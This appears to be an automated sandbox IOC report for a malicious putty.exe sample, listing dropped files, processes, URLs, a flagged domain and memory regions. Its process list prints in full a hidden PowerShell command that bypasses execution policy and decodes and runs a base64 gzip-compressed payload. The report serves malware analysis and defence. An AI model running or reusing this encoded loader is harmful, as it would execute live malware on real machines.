IOC Report
putty.exe

loading gif

Files

File Path
Type
Category
Malicious
putty.exe
PE32 executable (GUI) Intel 80386, for MS Windows
initial sample
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hcfx5wob.j5h.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vxj1zkei.vos.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\TF6MZ5T3LM2G3X08J664.temp
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms (copy)
data
dropped

Processes

Path
Cmdline
Malicious
C:\Users\user\Desktop\putty.exe
"C:\Users\user\Desktop\putty.exe"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -nop -w hidden -noni -ep bypass "&([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String('H4sIAOW/UWECA51W227jNhB991cMXHUtIRbhdbdAESCLepVsGyDdNVZu82AYCE2NYzUyqZKUL0j87yUlypLjBNtUL7aGczlz5kL9AGOxQbkoOIRwK1OtkcN8B5/Mz6SQHCW8g0u6RvidymTX6RhNplPB4TfU4S3OWZYi19B57IB5vA2DC/iCm/Dr/G9kGsLJLscvdIVGqInRj0r9Wpn8qfASF7TIdCQxMScpzZRx4WlZ4EFrLMV2R55pGHlLUut29g3EvE6t8wjl+ZhKuvKr/9NYy5Tfz7xIrFaUJ/1jaawyJvgz4aXY8EzQpJQGzqcUDJUCR8BKJEWGFuCvfgCVSroAvw4DIf4D3XnKk25QHlZ2pW2WKkO/ofzChNyZ/ytiWYsFe0CtyITlN05j9suHDz+dGhKlqdQ2rotcnroSXbT0Roxhro3Dqhx+BWX/GlyJa5QKTxEfXLdK/hLyaOwCdeeCF2pImJC5kFRj+U7zPEsZtUUjmWA06/Ztgg5Vp2JWaYl0ZdOoohLTgXEpM/Ab4FXhKty2ibquTi3USmVx7ewV4MgKMww7Eteqvovf9xam27DvP3oT430PIVUwPbL5hiuhMUKp04XNCv+iWZqU2UU0y+aUPcyC4AU4ZFTope1nazRSb6QsaJW84arJtU3mdL7TOJ3NPPtrm3VAyHBgnqcfHwd7xzfypD72pxq3miBnIrGTcH4+iqPr68DW4JPV8bu3pqXFRlX7JF5iloEsODfaYBgqlGnrLpyBh3x9bt+4XQpnRmaKdThgYpUXujm845HIdzK9X2rwowCGg/c/wx8pk0KJhYbIUWJJgJGNaDUVSDQB1piQO37HXdc6Tohdcug32fUH/eaF3CC/18t2P9Uz3+6ok4Z6G1XTsxncGJeWG7cvyAHn27HWVp+FvKJsaTBXTiHlh33UaDWw7eMfrfGA1NlWG6/2FDxd87V4wPBqmxtuleH74GV/PKRvYqI3jqFn6lyiuBFVOwdkTPXSSHsfe/+7dJtlmqHve2k5A5X5N6SJX3V8HwZ98I7sAgg5wuCktlcWPiYTk8prV5tbHFaFlCleuZQbL2b8qYXS8ub2V0lznQ54afCsrcy2sFyeFADCekVXzocf372HJ/ha6LDyCo6KI1dDKAmpHRuSv1MC6DVOthaIh1IKOR3MjoK1UJfnhGVIpR+8hOCi/WIGf9s5naT/1D6Nm++OTrtVTgantvmcFWp5uLXdGnSXTZQJhS6f5h6Ntcjry9N8eXQOXxyH4rirE0J3L9kF8i/mtl93dQkAAA=='))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))"
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

URLs

Name
IP
Malicious
http://pesterbdd.com/images/Pester.png
unknown
malicious
http://nuget.org/NuGet.exe
unknown
https://github.com/llvm/llvm-project/
unknown
https://www.chiark.greenend.org.uk/~sgtatham/putty/
unknown
https://aka.ms/pscore6lB
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://github.com/Pester/Pester
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
https://contoso.com/License
unknown
https://contoso.com/Icon
unknown
There are 2 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
bonus2.corporatebonusapplication.local
unknown
malicious

Memdumps

Base Address
Regiontype
Protect
Malicious
522000
unkown
page execute and write copy
malicious
401000
unkown
page execute read
malicious
401000
unkown
page execute read
malicious
522000
unkown
page execute and write copy
malicious
7746000
heap
page read and write
3147000
heap
page read and write
4ADA000
trusted library allocation
page execute and read and write
5338000
trusted library allocation
page read and write
785D000
trusted library allocation
page read and write
919000
heap
page read and write
4AE2000
trusted library allocation
page read and write
7A00000
trusted library allocation
page read and write
2920000
trusted library allocation
page read and write
759E000
stack
page read and write
7740000
heap
page read and write
8935000
trusted library allocation
page read and write
4AB4000
trusted library allocation
page read and write
79F0000
trusted library allocation
page read and write
321F000
stack
page read and write
5154000
trusted library allocation
page read and write
4FFE000
stack
page read and write
4A50000
heap
page read and write
722E000
stack
page read and write
58DA000
trusted library allocation
page read and write
2290000
heap
page read and write
49FE000
stack
page read and write
7A70000
trusted library allocation
page read and write
50D0000
heap
page execute and read and write
96000
stack
page read and write
2FCB000
heap
page read and write
25D4000
heap
page read and write
497000
unkown
page readonly
77A5000
heap
page read and write
759000
heap
page read and write
22D0000
heap
page read and write
7A30000
trusted library allocation
page read and write
4C1000
unkown
page write copy
78A0000
trusted library allocation
page read and write
779E000
heap
page read and write
400000
unkown
page readonly
78C0000
trusted library allocation
page read and write
791E000
stack
page read and write
79E0000
trusted library allocation
page read and write
6FE000
stack
page read and write
7A50000
trusted library allocation
page read and write
58E4000
trusted library allocation
page read and write
2F19000
heap
page read and write
7870000
trusted library allocation
page read and write
5020000
heap
page execute and read and write
8480000
trusted library allocation
page read and write
400000
unkown
page readonly
8D9000
heap
page read and write
72EE000
stack
page read and write
22D9000
heap
page read and write
8AA000
heap
page read and write
7A60000
trusted library allocation
page read and write
76F0000
heap
page read and write
4AB0000
trusted library allocation
page read and write
4B90000
heap
page readonly
79DD000
stack
page read and write
77BD000
heap
page read and write
730000
heap
page read and write
755E000
stack
page read and write
525000
unkown
page readonly
3009000
heap
page read and write
8560000
heap
page read and write
8566000
heap
page read and write
525000
unkown
page readonly
751E000
stack
page read and write
4B8E000
stack
page read and write
50E0000
heap
page read and write
915000
heap
page read and write
77E7000
heap
page read and write
2FD0000
heap
page read and write
50D5000
heap
page execute and read and write
4A9E000
stack
page read and write
757000
heap
page read and write
314E000
heap
page read and write
2B6B000
stack
page read and write
2E9E000
stack
page read and write
4F6C000
stack
page read and write
497000
unkown
page readonly
8490000
trusted library allocation
page read and write
492E000
stack
page read and write
7820000
trusted library allocation
page read and write
50F1000
trusted library allocation
page read and write
4AC9000
trusted library allocation
page read and write
7799000
heap
page read and write
58DE000
trusted library allocation
page read and write
6119000
trusted library allocation
page read and write
4BA8000
trusted library allocation
page read and write
754000
heap
page read and write
4B00000
trusted library allocation
page read and write
533A000
trusted library allocation
page read and write
7F5D0000
trusted library allocation
page execute and read and write
2BA8000
stack
page read and write
4AD0000
trusted library allocation
page read and write
856A000
heap
page read and write
670000
heap
page read and write
25D0000
heap
page read and write
2E56000
heap
page read and write
2E20000
heap
page read and write
311E000
stack
page read and write
750000
heap
page read and write
736B000
stack
page read and write
777F000
heap
page read and write
3721000
heap
page read and write
58E2000
trusted library allocation
page read and write
58D7000
trusted library allocation
page read and write
4AC0000
trusted library allocation
page read and write
4BE0000
heap
page read and write
2FCE000
heap
page read and write
88A0000
trusted library allocation
page read and write
4AE0000
trusted library allocation
page read and write
78D0000
heap
page execute and read and write
795E000
stack
page read and write
771B000
heap
page read and write
5468000
trusted library allocation
page read and write
2F10000
heap
page read and write
2E30000
heap
page read and write
506E000
stack
page read and write
60F1000
trusted library allocation
page read and write
931000
heap
page read and write
5415000
trusted library allocation
page read and write
4ABD000
trusted library allocation
page execute and read and write
258E000
stack
page read and write
778B000
heap
page read and write
71AE000
stack
page read and write
629A000
trusted library allocation
page read and write
25CE000
stack
page read and write
7880000
trusted library allocation
page read and write
4B4E000
stack
page read and write
4FAE000
stack
page read and write
592E000
trusted library allocation
page read and write
2E50000
heap
page read and write
8AE000
heap
page read and write
2EDE000
stack
page read and write
757000
heap
page read and write
8A0000
heap
page read and write
799E000
stack
page read and write
890000
heap
page read and write
590000
heap
page read and write
7601000
heap
page read and write
49BD000
stack
page read and write
71EF000
stack
page read and write
7840000
heap
page read and write
4C1000
unkown
page read and write
8550000
trusted library allocation
page execute and read and write
7A10000
trusted library allocation
page read and write
4C6000
unkown
page readonly
7787000
heap
page read and write
50E7000
heap
page read and write
4C6000
unkown
page readonly
7A80000
trusted library allocation
page read and write
A9F000
stack
page read and write
3720000
heap
page read and write
615D000
trusted library allocation
page read and write
4BD0000
trusted library allocation
page read and write
84FD000
stack
page read and write
4AA0000
trusted library allocation
page read and write
22B0000
unkown
page read and write
7800000
trusted library allocation
page read and write
726A000
stack
page read and write
19C000
stack
page read and write
78B0000
trusted library allocation
page execute and read and write
7370000
heap
page read and write
3130000
heap
page read and write
4A3D000
stack
page read and write
77AC000
heap
page read and write
4BC0000
trusted library allocation
page execute and read and write
916000
heap
page read and write
53D8000
trusted library allocation
page read and write
716B000
stack
page read and write
7850000
trusted library allocation
page read and write
8540000
heap
page read and write
5435000
trusted library allocation
page read and write
8470000
trusted library allocation
page execute and read and write
4C3000
unkown
page read and write
5813000
trusted library allocation
page read and write
7A40000
trusted library allocation
page read and write
7830000
trusted library allocation
page read and write
4AB3000
trusted library allocation
page execute and read and write
58E0000
trusted library allocation
page read and write
7A90000
trusted library allocation
page read and write
4AE5000
trusted library allocation
page execute and read and write
7889000
trusted library allocation
page read and write
7A20000
trusted library allocation
page read and write
2F78000
heap
page read and write
228E000
stack
page read and write
8D5000
heap
page read and write
5247000
trusted library allocation
page read and write
4960000
heap
page read and write
254F000
stack
page read and write
7860000
trusted library allocation
page read and write
523000
unkown
page write copy
22D5000
heap
page read and write
870000
heap
page read and write
75DF000
stack
page read and write
712D000
stack
page read and write
523000
unkown
page write copy
58DC000
trusted library allocation
page read and write
732E000
stack
page read and write
7810000
trusted library allocation
page read and write
33EF000
stack
page read and write
72AE000
stack
page read and write
853F000
stack
page read and write
3140000
heap
page read and write
There are 197 hidden memdumps, click here to show them.